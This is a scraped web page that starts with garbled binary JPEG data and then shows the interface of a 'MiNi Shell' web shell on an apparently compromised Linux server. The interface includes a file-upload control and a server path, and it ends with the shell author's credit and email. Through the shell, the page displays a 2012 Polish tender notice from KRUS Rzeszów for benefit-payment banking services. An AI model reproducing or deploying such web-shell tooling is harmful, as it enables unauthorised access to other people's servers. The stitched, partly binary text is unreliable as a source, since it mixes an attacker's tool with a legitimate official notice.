JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121113/239553-N-2012.html

<p class="kh_header"><b>Rzeszów: Świadczenie usług w zakresie wypłat świadczeń z ubezpieczenia społecznego rolników oraz przekazywania wynagrodzeń na indywidualne konta bankowe</b><br>
<b>Numer ogłoszenia: 239553 - 2012; data zamieszczenia: 13.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Rzeszowie , ul. Słowackiego 7, 35-060 Rzeszów, woj. podkarpackie, tel. 17 8621266, faks 17 8622526.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie wypłat świadczeń z ubezpieczenia społecznego rolników oraz przekazywania wynagrodzeń na indywidualne konta bankowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie wypłat świadczeń z ubezpieczenia społecznego rolników oraz przekazywania wynagrodzeń na indywidualne konta bankowe osób fizycznych, prowadzone w różnych bankach na terenie całego kraju. 
2. Zamawiający nie gwarantuje stałej ilości poleceń przelewów. 
3. Jest to zamówienie na usługę o kodzie  alfanumerycznym słownika podstawowego CPV 66.11.00.00-4 (Usługi bankowe). 
4. W ramach świadczenia usług, o których mowa w ust. 1 Wykonawca otrzyma od Zamawiającego na każde konkretne zlecenie zbiorczy przelew środków - za pomocą bankowości elektronicznej, pliki zawierające elektroniczne przelewy w formacie Videotel i egzemplarz protokołu przyjęcia i odbioru plików -  za pomocą bezpiecznej poczty elektronicznej (home - banking lub równoważnej). Wykonawca zobowiązany będzie do udostępnienia, zainstalowania, konserwowania i aktualizowania oprogramowania służącego do przesyłania bezpiecznej poczty elektronicznej (home - banking lub równoważnej) oraz przeszkolenia pracowników Zamawiającego w zakresie obsługi oprogramowania -  bez żadnych dodatkowych opłat z tego tytułu.
5. W przypadku realizacji zleceń w formie home - bankingu lub równoważnej, Zamawiający dopuszcza możliwość wprowadzenia uzgodnień w formie Porozumienia dotyczącego szczegółowego sposobu realizacji świadczenia przez Wykonawcę usługi bankowości elektronicznej jako załącznik do umowy. Jednocześnie Wykonawca zapewni aby autoryzacja i wysyłka zleceń odbywała się w formie podpisu elektronicznego, który winien być udostępniony przez Wykonawcę i na Jego koszt. Ponadto Wykonawca zapewni kontrolę i zabezpieczenie systemu przed podwójną realizacją tych samych plików.
6. System powinien charakteryzować się przejrzystym interfejsem graficznym opartym o system Windows 32, oraz 64-bitowy lub przeglądarkę internetową.
7. Nie dopuszcza się programu opartego o system DOS.
8. Nie dopuszcza się modemu do komunikacji z bankiem oraz transmisji przelewów.
9. W razie zaistnienia nieprzewidzianych okoliczności uniemożliwiających przekazywanie plików za pomocą poczty elektronicznej, Wykonawca zobowiązany będzie do odbierania płyty CDR zawierającej wszystkie niezbędne dane do wypłaty świadczeń w opieczętowanej kopercie z siedziby KRUS OR w Rzeszowie, ul. Słowackiego 7, za pokwitowaniem, przez upoważnionego do tego pracownika.
10. Świadczenia emerytalno - rentowe płatne będą w terminach 10, 15 i 20 dzień każdego miesiąca a świadczenia krótkoterminowe i jednorazowe płatne będą w terminach 10, 20 i 30 dzień każdego miesiąca i w tych dniach muszą znaleźć się na rachunkach bankowych świadczeniobiorców. W przypadku gdy 10,15 lub 20 dzień miesiąca dla świadczeń emerytalno - rentowych albo 10, 20 lub 30 dzień miesiąca dla świadczeń krótkoterminowych i jednorazowych, będzie dniem wolnym od pracy (soboty, niedziele, święta), wypłata następuje w dniu poprzedzającym. Wynagrodzenia na indywidualne konta bankowe płatne będą na bieżąco.
11. Wykonawca odbierał będzie pliki wyłącznie w dni robocze (oprócz sobót, niedziel i świąt) w godzinach od 9:00 do 15:00. Usługa wypłat na indywidualne konta bankowe musi być dokonana najbliższą sesją w dniu otrzymania od Zamawiającego zbiorczego polecenia przelewu, o którym mowa w ust. 4 i środków pieniężnych na jego realizację do godziny 15:00 danego dnia. 
12. W przypadku gdy środki na wypłatę świadczeń oraz zbiorcze polecenia przelewu zawierające dane do wypłaty, wpłyną do Wykonawcy po godzinie 15:00, Wykonawca zobowiązany jest do przekazania wypłat  pierwszą sesją w następnym dniu roboczym. 
13. Wykonawca będzie realizował zlecenia Zamawiającego podpisane wyłącznie przez osoby upoważnione.
14. W przypadku nieterminowych wypłat z przyczyn leżących po stronie Wykonawcy odsetki należne z tego tytułu świadczeniobiorcom i pracownikom w całości pokrywa Wykonawca z własnych środków.
15. Za czynności związane z wykonywaniem przedmiotu zamówienia, Zamawiający uiści Wykonawcy opłatę naliczoną w oparciu o ilość sztuk zrealizowanych przelewów w danym miesiącu pomnożoną przez stawkę opłaty za 1 sztukę przelewu na indywidualne konta bankowe prowadzone przez inne banki.
16. Przelewy świadczeń na indywidualne konta (ROR) świadczeniobiorców i pracowników prowadzone przez Wykonawcę, jego oddziały i  filie będą bezpłatne.
17. Opłata za wykonanie usługi nie będzie podlegała podwyższeniu w okresie obowiązywania umowy i nie przewiduje się stosowania żadnych innych opłat, z zastrzeżeniem przypadku gdy opłata będzie podlegała zmianie w przypadku zmiany stawki podatku od towarów i usług VAT o różnicę wynikającą ze zmiany tej stawki, począwszy od dnia zmiany stawki
18. Opłata o której mowa w ust. 15, płatna będzie raz w miesiącu, na podstawie ilości zrealizowanych przelewów środków pieniężnych na indywidualne konta bankowe prowadzone przez inne banki w miesiącu poprzednim i faktury sporządzonej przez Wykonawcę, w terminie 14 dni od daty otrzymania przez Zamawiającego faktury na konto podane na fakturze. 
19. Środki na wypłatę świadczeń przekazywane będą na rachunek techniczny Wykonawcy.
20. W przypadku niezrealizowania przelewu np. z powodu likwidacji konta, błędnego numeru konta, Wykonawca najpóźniej następnego dnia po otrzymaniu zwrotu zwraca niewykorzystane środki na rachunek Zamawiającego podany w umowie.
21. W przypadku niezrealizowania przelewu dla danego świadczeniobiorcy lub pracownika, Wykonawca jest zobowiązany do zamieszczenia w treści zwrotu przelewu danych dotyczących przelewu takich jak:
- nazwisko i imię,
- adres,
- kwota,
- treść,
- nr świadczenia.
22. Wykonawca będzie miał prawo odmówić realizacji wszystkich przelewów na podstawie otrzymanego pliku jeśli:
a) na rachunku o którym mowa w ust. 19 nie będzie wystarczających środków do pokrycia wszystkich przelewów w pliku,
b) przekazany lub przesłany plik uległ uszkodzeniu lub zawierał błędy,
c) przesłany pocztą elektroniczną plik nie został prawidłowo zaszyfrowany i podpisany lub został przesłany z innego adresu poczty elektronicznej niż ten który zostanie wskazany w umowie.  
23. Wykonawca zobowiązany będzie do niezwłocznego pokrycia w pełnej wysokości szkody wyrządzonej Zamawiającemu przez nieterminową realizację wypłat świadczeń lub wypłacenie świadczeń osobie nieuprawnionej oraz wskutek niewykonania lub nienależytego wykonania postanowień zawartej umowy, jeżeli szkoda ta powstanie z przyczyn leżących po stronie Wykonawcy.
24. Zamawiający zastrzega sobie prawo potrącenia kwot należnego odszkodowania z opłaty należnej Wykonawcy za wykonania czynności będących przedmiotem umowy.
25. W przypadku nienależytego wykonywania przez Wykonawcę obowiązków wynikających z umowy, Zamawiającemu przysługiwać będzie prawo odstąpienia od umowy lub jej części, o czym zawiadomi pisemnie Wykonawcę.
26. W przypadku odstąpienia od umowy, Zamawiający może dochodzić od Wykonawcy zapłaty odszkodowania na zasadach ogólnych.
27. Wykonawca zobowiązany będzie do przestrzegania przepisów ustawy z dnia 29.08.1997 r. o ochronie danych osobowych (Dz. U. z 2002 r., Nr 101, poz. 926 z późn. zm.) oraz przepisów wykonawczych wydanych na jej podstawie, w szczególności do zabezpieczenia danych osobowych świadczeniobiorców i pracowników oraz do przetwarzania tych danych, wyłącznie w zakresie i w celu realizacji postanowień zawartej umowy.
28. Wykonawca zobowiązany będzie do nie udostępniania danych osobowych świadczeniobiorców i pracowników innym osobom i podmiotom.
29. Wszelkie dodatkowe (szczegółowe) regulacje Wykonawcy, tj. regulaminy, specyfikacje, konfiguracje, itp., w zakresie systemów bankowości elektronicznej oraz w zakresie dokonywania rozliczeń pieniężnych będą wiążące, o ile nie są sprzeczne z opisem przedmiotu zamówienia zawartym w SIWZ oraz we wzorze umowy (Załącznik Nr 5 do SIWZ).
30. Szacunkowa ilość wypłacanych świadczeń emerytalno - rentowych w okresie trwania umowy (tj. 36 m-cy) wynosi około 29000 szt. miesięcznie. Ilości wypłacanych świadczeń są wartością szacunkową (średnia miesięczna za okres III kwartału br.) i mogą ulegać zmianom.
Szacunkowa ilość wypłacanych wynagrodzeń na indywidualne konta bankowe w okresie trwania umowy (tj. 36 m-cy) wynosi około 735 szt. miesięcznie. Ilości wypłacanych świadczeń są wartością szacunkową (średnia miesięczna za okres III kwartału br.) i mogą ulegać zmianom.
Szacunkowa ilość wypłacanych świadczeń krótkoterminowych i jednorazowych w okresie trwania umowy (tj. 36 m-cy) wynosi około 6000 szt. miesięcznie. Ilości wypłacanych świadczeń są wartością szacunkową (średnia miesięczna za okres III kwartału br.) i mogą ulegać zmianom.  
Zmiana wartości przedmiotu zamówienia, która wystąpiłaby w związku ze zmianą ilości świadczeniobiorców lub pracowników nie będzie stanowić zmiany umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w tym zakresie uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu (wg Załącznika nr 2 do SIWZ) oraz wykaże, że posiada Zezwolenie Prezesa NBP lub Komisji Nadzoru Bankowego na wykonywanie czynności bankowych określonych w art. 5 ust. 1 ustawy z dnia 29 sierpnia 1997r. Prawo bankowe (Dz. U. z 2002 roku Nr 72, poz.665 z późniejszymi zmianami)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu (wg Załącznika nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu (wg Załącznika nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu (wg Załącznika nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu (wg Załącznika nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wprowadzenie dodatkowych lub zmiana terminów wypłaty świadczeń.
2. Zmiana procedury dostarczania danych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Rzeszowie, ul. Słowackiego 7, 35-060 Rzeszów, pokój numer 112.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 11:00, miejsce: Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Rzeszowie, ul. Słowackiego 7, 35-060 Rzeszów, Sekretariat - 1 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com